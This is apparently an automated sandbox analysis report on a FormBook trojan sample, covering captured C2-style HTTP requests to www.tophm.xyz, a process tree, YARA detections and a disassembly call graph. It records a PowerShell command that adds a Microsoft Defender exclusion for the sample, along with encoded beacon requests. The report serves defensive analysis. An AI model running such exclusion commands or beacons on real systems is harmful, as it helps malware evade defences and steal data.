                                                    Data Ascii: 8T2hn=9fTG7T7D5sAG3IkFjKGJ09VVx0aIxjeE9fh5CR/DoPLKRTyxwS7CHCWCwlCoxIZrN+d9ETf7oAYfqdmpPTjgh5Bl1rEWCAZBJ3SOaSR3Rv6X+c7DTBc7I6Bf6c1f2H5JQlOMP5ugEzDynGB9SwdNLu3C7fOAeXCHTR0nwqK/qQBzHXzgXgjk5wFUECaQL+EMSq4BuzZgEsejOhM9yeWb939VYN5fsFtX3O1zeidUz2zwxXOK6TG2L3sBHNOrx1xnJjx9M3ddnWXW1E0LhiHUtXY6Q+E+IbnHUX5g0HBCgw8W0yaBs53w7U0CGcIGDEGknd0abNKsDlpdYLaDqQVDGJfyAHe0/ZGvUwScjl6X49r4w33i6J1dbEglauCv74XPrJuhi9JsszWqL8EJXMZUZNzb/7h3f26EyrCz8n21OhfW0XTtxOGo2aAtrd3RDx25LBFxbwGW7dd/FWPDUWn1NPkEZVOiDKnJ9dXTxoBxYAIoYcfIiSF/Xw0N/4DdWnzmPh6J40BI7AY+wiH9fN4ayrLrQGdGeu4wLNKNG7XTYbV6Cu/l2MHe4AzboE0p48S2HUlRsdMfUd02d1PrOY9NF8AEqLazO0tPlEvjMcUGemEGAsNdo9jD/DSUFF5sfYIPTplsY+uLVVkK5h6XI6T0nPkq7N/u7A9NgVj8EIAq0yNX4J9SG2xhXN03diT+78u6CaEhUeldneezy9oEL3M9DGsoBENADjrz1X8u6BI7NDMMrqU6bfv+hwE4OanT7WX2s+mpEOCknzTnXRBjCB3NsGLqG4px/GUhyJo1qyL3AUet/tBNCoKwyprHr/1dNXwZ41TNcW/9ZxUxdVnta7ftoV+13h1Z3+cb2M+0eNGS8iwNgB+GaiHvz6GbDEppGNpbDSbQ0e1sQ1EZxWQkzjf7pUfRdfGNYDTElgkZf8us72RKrMEAp0U31InFXKJSh2B/G/tWV52YSmB5sY5/PUE6WCElh9BKQtgeMu6KwrD6PFroC1 [TRUNCATED]
                                                    Oct 9, 2024 14:03:02.522177935 CEST980INHTTP/1.1 404 Not Found
                                                    Date: Wed, 09 Oct 2024 12:03:02 GMT
                                                    Server: Apache
                                                    X-Frame-Options: SAMEORIGIN
                                                    Content-Length: 774
                                                    X-XSS-Protection: 1; mode=block
                                                    Connection: close
                                                    Content-Type: text/html
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 [TRUNCATED]
                                                    Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</span>4</h1></div><h2>the page you requested could not found</h2><form class="notfound-search"><input type="text" placeholder="Search..."><button type="button"><span></span></button></form></div></div></body></html>


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    16192.168.2.949996199.192.21.16980
                                                    TimestampBytes transferredDirectionData
                                                    Oct 9, 2024 14:03:04.979829073 CEST509OUTGET /30rz/?wZBh=UzoT8ph&8T2hn=wd7m4mq4h41P+rN28pyT+ttY7GHVuAvuqtpnERraqOjaWWvMpBvRQDu/0Ra1ptpTEf0KGGfWsjsqje2uOEmu4OBI5eYxRB5JEme+Ix16OOjxqM3SMw== HTTP/1.1
                                                    Host: www.tophm.xyz
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                    Accept-Language: en-US,en;q=0.9
                                                    Connection: close
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E)
                                                    Oct 9, 2024 14:03:05.563469887 CEST995INHTTP/1.1 404 Not Found
                                                    Date: Wed, 09 Oct 2024 12:03:05 GMT
                                                    Server: Apache
                                                    X-Frame-Options: SAMEORIGIN
                                                    Content-Length: 774
                                                    X-XSS-Protection: 1; mode=block
                                                    Connection: close
                                                    Content-Type: text/html; charset=utf-8
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 [TRUNCATED]
                                                    Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</span>4</h1></div><h2>the page you requested could not found</h2><form class="notfound-search"><input type="text" placeholder="Search..."><button type="button"><span></span></button></form></div></div></body></html>


                                                    Statistics

                                                    CPU Usage

                                                    Click to jump to process

                                                    Memory Usage

                                                    Click to jump to process

                                                    High Level Behavior Distribution

                                                    Click to dive into process behavior distribution

                                                    Behavior

                                                    Click to jump to process

                                                    System Behavior

                                                    General

                                                    Target ID:0
                                                    Start time:08:00:57
                                                    Start date:09/10/2024
                                                    Path:C:\Users\user\Desktop\NU1aAbSmCr.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Users\user\Desktop\NU1aAbSmCr.exe"
                                                    Imagebase:0x610000
                                                    File size:694'784 bytes
                                                    MD5 hash:519B9A9E52AA6E23736F01AFA4001654
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:low
                                                    Has exited:true

                                                    General

                                                    Target ID:3
                                                    Start time:08:00:58
                                                    Start date:09/10/2024
                                                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\NU1aAbSmCr.exe"
                                                    Imagebase:0x370000
                                                    File size:433'152 bytes
                                                    MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    General

                                                    Target ID:4
                                                    Start time:08:00:58
                                                    Start date:09/10/2024
                                                    Path:C:\Users\user\Desktop\NU1aAbSmCr.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Users\user\Desktop\NU1aAbSmCr.exe"
                                                    Imagebase:0xb20000
                                                    File size:694'784 bytes
                                                    MD5 hash:519B9A9E52AA6E23736F01AFA4001654
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.1824100351.0000000003450000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.1824100351.0000000003450000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.1821048829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.1821048829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.1822625318.0000000001950000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.1822625318.0000000001950000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                    Reputation:low
                                                    Has exited:true

                                                    General

                                                    Target ID:5
                                                    Start time:08:00:58
                                                    Start date:09/10/2024
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff70f010000
                                                    File size:862'208 bytes
                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    General

                                                    Target ID:6
                                                    Start time:08:01:02
                                                    Start date:09/10/2024
                                                    Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                    Imagebase:0x7ff72d8c0000
                                                    File size:496'640 bytes
                                                    MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                    Has elevated privileges:true
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:false

                                                    General

                                                    Target ID:10
                                                    Start time:08:01:38
                                                    Start date:09/10/2024
                                                    Path:C:\Program Files (x86)\ZFyhsaImMGOFEfKEektcPzxHoWTTOspFruWOLxwRgdfvda\mCFHCvdrqdDiDT.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Program Files (x86)\ZFyhsaImMGOFEfKEektcPzxHoWTTOspFruWOLxwRgdfvda\mCFHCvdrqdDiDT.exe"
                                                    Imagebase:0x50000
                                                    File size:140'800 bytes
                                                    MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.2580938292.0000000002D40000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000A.00000002.2580938292.0000000002D40000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                    Reputation:high
                                                    Has exited:false

                                                    General

                                                    Target ID:11
                                                    Start time:08:01:40
                                                    Start date:09/10/2024
                                                    Path:C:\Windows\SysWOW64\NETSTAT.EXE
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Windows\SysWOW64\NETSTAT.EXE"
                                                    Imagebase:0x5f0000
                                                    File size:32'768 bytes
                                                    MD5 hash:9DB170ED520A6DD57B5AC92EC537368A
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.2580801626.00000000034E0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000B.00000002.2580801626.00000000034E0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.2581282687.0000000003610000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000B.00000002.2581282687.0000000003610000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.2578681040.0000000003040000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000B.00000002.2578681040.0000000003040000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                    Reputation:moderate
                                                    Has exited:false

                                                    General

                                                    Target ID:14
                                                    Start time:08:01:52
                                                    Start date:09/10/2024
                                                    Path:C:\Program Files (x86)\ZFyhsaImMGOFEfKEektcPzxHoWTTOspFruWOLxwRgdfvda\mCFHCvdrqdDiDT.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Program Files (x86)\ZFyhsaImMGOFEfKEektcPzxHoWTTOspFruWOLxwRgdfvda\mCFHCvdrqdDiDT.exe"
                                                    Imagebase:0x50000
                                                    File size:140'800 bytes
                                                    MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000E.00000002.2583578419.00000000049B0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000E.00000002.2583578419.00000000049B0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                    Reputation:high
                                                    Has exited:false

                                                    General

                                                    Target ID:15
                                                    Start time:08:02:04
                                                    Start date:09/10/2024
                                                    Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                    Imagebase:0x7ff73feb0000
                                                    File size:676'768 bytes
                                                    MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Disassembly

                                                    Reset < >

                                                      Execution Graph

                                                      Execution Coverage:9.9%
                                                      Dynamic/Decrypted Code Coverage:100%
                                                      Signature Coverage:0%
                                                      Total number of Nodes:191
                                                      Total number of Limit Nodes:12
                                                      execution_graph 31013 f94668 31014 f9467a 31013->31014 31015 f94686 31014->31015 31019 f94779 31014->31019 31025 f93e34 31015->31025 31017 f946a5 31020 f94780 31019->31020 31029 f94883 31020->31029 31033 f9487b 31020->31033 31037 f94888 31020->31037 31026 f93e3f 31025->31026 31045 f95cb8 31026->31045 31028 f9709e 31028->31017 31031 f948af 31029->31031 31030 f9498c 31031->31030 31041 f944b4 31031->31041 31035 f94884 31033->31035 31034 f9498c 31034->31034 31035->31034 31036 f944b4 CreateActCtxA 31035->31036 31036->31034 31038 f948af 31037->31038 31039 f944b4 CreateActCtxA 31038->31039 31040 f9498c 31038->31040 31039->31040 31042 f95918 CreateActCtxA 31041->31042 31044 f959db 31042->31044 31044->31044 31046 f95cc3 31045->31046 31049 f95cf8 31046->31049 31048 f9718d 31048->31028 31050 f95d03 31049->31050 31053 f95d28 31050->31053 31052 f97262 31052->31048 31054 f95d33 31053->31054 31057 f95d58 31054->31057 31056 f97365 31056->31052 31058 f95d63 31057->31058 31060 f988cb 31058->31060 31065 f9ab79 31058->31065 31059 f98909 31059->31056 31060->31059 31070 f9cc70 31060->31070 31075 f9cc65 31060->31075 31080 f9cc61 31060->31080 31066 f9ab80 31065->31066 31085 f9afa1 31066->31085 31090 f9afb0 31066->31090 31067 f9ab86 31067->31060 31071 f9cc91 31070->31071 31072 f9ccb5 31071->31072 31104 f9d228 31071->31104 31108 f9d221 31071->31108 31072->31059 31076 f9cc6c 31075->31076 31077 f9ccb5 31076->31077 31078 f9d228 3 API calls 31076->31078 31079 f9d221 3 API calls 31076->31079 31077->31059 31078->31077 31079->31077 31081 f9cc68 31080->31081 31082 f9ccb5 31081->31082 31083 f9d228 3 API calls 31081->31083 31084 f9d221 3 API calls 31081->31084 31082->31059 31083->31082 31084->31082 31086 f9afa8 31085->31086 31087 f9afbf 31086->31087 31094 f9b0a8 31086->31094 31099 f9b097 31086->31099 31087->31067 31092 f9b0a8 GetModuleHandleW 31090->31092 31093 f9b097 GetModuleHandleW 31090->31093 31091 f9afbf 31091->31067 31092->31091 31093->31091 31095 f9b0b9 31094->31095 31096 f9b0dc 31094->31096 31095->31096 31097 f9b2e0 GetModuleHandleW 31095->31097 31096->31087 31098 f9b30d 31097->31098 31098->31087 31100 f9b0dc 31099->31100 31101 f9b0b9 31099->31101 31100->31087 31101->31100 31102 f9b2e0 GetModuleHandleW 31101->31102 31103 f9b30d 31102->31103 31103->31087 31105 f9d235 31104->31105 31106 f9d26f 31105->31106 31112 f9cff0 31105->31112 31106->31072 31109 f9d235 31108->31109 31110 f9cff0 3 API calls 31109->31110 31111 f9d26f 31109->31111 31110->31111 31111->31072 31113 f9cffb 31112->31113 31115 f9db80 31113->31115 31116 f9d11c 31113->31116 31115->31115 31117 f9d127 31116->31117 31118 f95d58 3 API calls 31117->31118 31119 f9dbef 31118->31119 31122 f9f980 31119->31122 31120 f9dc29 31120->31115 31123 f9f9b1 31122->31123 31125 f9fab1 31122->31125 31124 f9f9bd 31123->31124 31126 4f509b4 CreateWindowExW 31123->31126 31127 4f509c0 CreateWindowExW 31123->31127 31128 4f509bb CreateWindowExW 31123->31128 31124->31120 31125->31120 31126->31125 31127->31125 31128->31125 31129 c9d01c 31130 c9d034 31129->31130 31131 c9d08e 31130->31131 31137 4f52c08 31130->31137 31145 4f52c0c 31130->31145 31153 4f51ea0 31130->31153 31157 4f51eb0 31130->31157 31161 4f51434 31130->31161 31138 4f52c10 31137->31138 31139 4f52c79 31138->31139 31141 4f52c69 31138->31141 31179 4f5155c 31139->31179 31169 4f52da0 31141->31169 31174 4f52d93 31141->31174 31142 4f52c77 31146 4f52c14 31145->31146 31147 4f52c79 31146->31147 31149 4f52c69 31146->31149 31148 4f5155c CallWindowProcW 31147->31148 31150 4f52c77 31148->31150 31151 4f52da0 CallWindowProcW 31149->31151 31152 4f52d93 CallWindowProcW 31149->31152 31150->31150 31151->31150 31152->31150 31154 4f51ea8 31153->31154 31155 4f51434 CallWindowProcW 31154->31155 31156 4f51ef7 31155->31156 31156->31131 31158 4f51ed6 31157->31158 31159 4f51434 CallWindowProcW 31158->31159 31160 4f51ef7 31159->31160 31160->31131 31162 4f5143f 31161->31162 31163 4f52c79 31162->31163 31165 4f52c69 31162->31165 31164 4f5155c CallWindowProcW 31163->31164 31166 4f52c77 31164->31166 31167 4f52da0 CallWindowProcW 31165->31167 31168 4f52d93 CallWindowProcW 31165->31168 31166->31166 31167->31166 31168->31166 31171 4f52db4 31169->31171 31170 4f52e40 31170->31142 31183 4f52e53 31171->31183 31186 4f52e58 31171->31186 31175 4f52db4 31174->31175 31177 4f52e53 CallWindowProcW 31175->31177 31178 4f52e58 CallWindowProcW 31175->31178 31176 4f52e40 31176->31142 31177->31176 31178->31176 31180 4f51567 31179->31180 31181 4f5435a CallWindowProcW 31180->31181 31182 4f54309 31180->31182 31181->31182 31182->31142 31184 4f52e69 31183->31184 31189 4f5429e 31183->31189 31184->31170 31187 4f52e69 31186->31187 31188 4f5429e CallWindowProcW 31186->31188 31187->31170 31188->31187 31190 4f5155c CallWindowProcW 31189->31190 31191 4f542aa 31190->31191 31191->31184 31192 f9d340 31193 f9d386 31192->31193 31197 f9d519 31193->31197 31200 f9d520 31193->31200 31194 f9d473 31198 f9d54e 31197->31198 31203 f9d0b8 31197->31203 31198->31194 31201 f9d0b8 DuplicateHandle 31200->31201 31202 f9d54e 31201->31202 31202->31194 31204 f9d588 DuplicateHandle 31203->31204 31205 f9d61e 31204->31205 31205->31198 31206 4f57368 31207 4f57395 31206->31207 31214 4f570e8 31207->31214 31210 4f570e8 3 API calls 31211 4f57429 31210->31211 31212 4f570e8 3 API calls 31211->31212 31213 4f574bf 31212->31213 31215 4f570f3 31214->31215 31218 4f57298 31215->31218 31217 4f573f7 31217->31210 31219 4f572a3 31218->31219 31220 4f59642 31219->31220 31222 f95d58 3 API calls 31219->31222 31224 f98609 31219->31224 31232 f95db7 31219->31232 31220->31217 31222->31220 31225 f98643 31224->31225 31227 f988cb 31225->31227 31231 f9ab79 2 API calls 31225->31231 31226 f98909 31226->31220 31227->31226 31228 f9cc61 3 API calls 31227->31228 31229 f9cc70 3 API calls 31227->31229 31230 f9cc65 3 API calls 31227->31230 31228->31226 31229->31226 31230->31226 31231->31227 31233 f95dbb 31232->31233 31235 f95d63 31232->31235 31234 f98909 31234->31220 31236 f988cb 31235->31236 31240 f9ab79 2 API calls 31235->31240 31236->31234 31237 f9cc61 3 API calls 31236->31237 31238 f9cc70 3 API calls 31236->31238 31239 f9cc65 3 API calls 31236->31239 31237->31234 31238->31234 31239->31234 31240->31236 31241 6ed1b10 31242 6ed1cd0 31241->31242 31244 6ed1b36 31241->31244 31243 6ed1c9b 31244->31243 31246 6ed0088 31244->31246 31247 6ed1d90 PostMessageW 31246->31247 31248 6ed1dfc 31247->31248 31248->31244

                                                      Executed Functions

                                                      Function 06ED0CD0 Relevance: .2, Instructions: 174COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1371935689.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_6ed0000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 7b329621c10687f8cd315233585fdbd1027ce64b7372108311a5ab9f433f06ce
                                                      • Instruction ID: 71ac25e0dd6a1b2115f0655bd1e9be61cd068db5da25e02716f98abd69545d81
                                                      • Opcode Fuzzy Hash: 7b329621c10687f8cd315233585fdbd1027ce64b7372108311a5ab9f433f06ce
                                                      • Instruction Fuzzy Hash: 1071F771D45329CFEB68CF66CC407E9BBB6BF89300F14D1AAD509A6250EB715A86CF40
                                                      Function 00F9B0A8 Relevance: 1.7, APIs: 1, Instructions: 198COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 943 f9b0a8-f9b0b7 944 f9b0b9-f9b0c6 call f99b14 943->944 945 f9b0e3-f9b0e7 943->945 950 f9b0c8 944->950 951 f9b0dc 944->951 947 f9b0e9-f9b0f3 945->947 948 f9b0fb-f9b13c 945->948 947->948 954 f9b149-f9b157 948->954 955 f9b13e-f9b146 948->955 998 f9b0ce call f9b331 950->998 999 f9b0ce call f9b340 950->999 951->945 956 f9b159-f9b15e 954->956 957 f9b17b-f9b17d 954->957 955->954 959 f9b169 956->959 960 f9b160-f9b167 call f9ad10 956->960 962 f9b180-f9b187 957->962 958 f9b0d4-f9b0d6 958->951 961 f9b218-f9b2d8 958->961 964 f9b16b-f9b179 959->964 960->964 993 f9b2da-f9b2dd 961->993 994 f9b2e0-f9b30b GetModuleHandleW 961->994 965 f9b189-f9b191 962->965 966 f9b194-f9b19b 962->966 964->962 965->966 968 f9b1a8-f9b1b1 call f9ad20 966->968 969 f9b19d-f9b1a5 966->969 974 f9b1be-f9b1c3 968->974 975 f9b1b3-f9b1bb 968->975 969->968 976 f9b1e1-f9b1ee 974->976 977 f9b1c5-f9b1cc 974->977 975->974 984 f9b211-f9b217 976->984 985 f9b1f0-f9b20e 976->985 977->976 979 f9b1ce-f9b1de call f9ad30 call f9ad40 977->979 979->976 985->984 993->994 995 f9b30d-f9b313 994->995 996 f9b314-f9b328 994->996 995->996 998->958 999->958
                                                      APIs
                                                      • GetModuleHandleW.KERNELBASE(00000000), ref: 00F9B2FE
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1349983281.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f90000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID: HandleModule
                                                      • String ID:
                                                      • API String ID: 4139908857-0
                                                      • Opcode ID: 7828e3ae51e4cf0b058ba33e509bed93d9379cc3cf4e173edb005ca5c0057368
                                                      • Instruction ID: 83300f11a69d2fb5d59b8d44b55226c46019698eb4b11de5afa2502709338b04
                                                      • Opcode Fuzzy Hash: 7828e3ae51e4cf0b058ba33e509bed93d9379cc3cf4e173edb005ca5c0057368
                                                      • Instruction Fuzzy Hash: A7716770A00B058FEB24DF2AE55175ABBF1FF88314F00892DD486D7A50DB75E846CB91
                                                      Function 04F51408 Relevance: 1.6, APIs: 1, Instructions: 116COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1000 4f51408-4f51d5e 1002 4f51d60-4f51d66 1000->1002 1003 4f51d69-4f51d70 1000->1003 1002->1003 1004 4f51d72-4f51d78 1003->1004 1005 4f51d7b-4f51e1a CreateWindowExW 1003->1005 1004->1005 1007 4f51e23-4f51e5b 1005->1007 1008 4f51e1c-4f51e22 1005->1008 1012 4f51e5d-4f51e60 1007->1012 1013 4f51e68 1007->1013 1008->1007 1012->1013 1014 4f51e69 1013->1014 1014->1014
                                                      APIs
                                                      • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 04F51E0A
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1365378642.0000000004F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F50000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_4f50000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID: CreateWindow
                                                      • String ID:
                                                      • API String ID: 716092398-0
                                                      • Opcode ID: df9e557f435391b18ce593e8f6d167c93ee041f7cae6a33df04b0e9a11685ad9
                                                      • Instruction ID: dce689fcdaf752a7209ad89dfff25fc4f1c01073fab159898a1b757158e53fb8
                                                      • Opcode Fuzzy Hash: df9e557f435391b18ce593e8f6d167c93ee041f7cae6a33df04b0e9a11685ad9
                                                      • Instruction Fuzzy Hash: A751A0B1D00309DFDB14CF9AD984ADEBBB5FF48310F64812AE919AB210D775A945CF90
                                                      Function 04F51CEC Relevance: 1.6, APIs: 1, Instructions: 116COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1015 4f51cec-4f51d5e 1017 4f51d60-4f51d66 1015->1017 1018 4f51d69-4f51d70 1015->1018 1017->1018 1019 4f51d72-4f51d78 1018->1019 1020 4f51d7b-4f51db3 1018->1020 1019->1020 1021 4f51dbb-4f51e1a CreateWindowExW 1020->1021 1022 4f51e23-4f51e5b 1021->1022 1023 4f51e1c-4f51e22 1021->1023 1027 4f51e5d-4f51e60 1022->1027 1028 4f51e68 1022->1028 1023->1022 1027->1028 1029 4f51e69 1028->1029 1029->1029
                                                      APIs
                                                      • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 04F51E0A
                                                      Memory Dump Source
